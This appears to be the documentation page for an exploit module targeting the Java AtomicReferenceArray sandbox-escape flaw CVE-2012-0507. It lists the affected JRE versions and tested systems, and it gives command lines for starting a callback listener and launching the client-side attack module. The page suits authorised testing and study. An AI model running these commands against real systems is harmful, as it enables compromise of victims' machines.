Name | java_AtomicReferenceArray |
---|---|
CVE | CVE-2012-0507 Exploit Pack |
VENDOR: Sun | |
Notes: | |
There is a Type Confusion vulnerability in java.util.concurrent.atomic.AtomicReferenceArray class. | |
When creating a new instance of an AtomicReferenceArray the array type has to be specified, however the AtomicReferenceArray.set method | |
does not properly check the object type being inserted. | |
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox. |
Affected versions
JDK and JRE 7 Update 2 and earlier
JDK and JRE 6 Update 30 and earlier
JDK and JRE 5.0 Update 33 and earlier
SDK and JRE 1.4.2_35 and earlier
Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 1
- Windows 7 SP1 with JDK/JRE 6 update 29
- Windows 7 SP1 with JDK/JRE 5 update 22
- Windows XP SP3 with JDK/JRE 7 and 7 update 1
To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0
Repeatability: Infinite (client side - no crash)
References: http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3
http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
Date public: 02/14/2012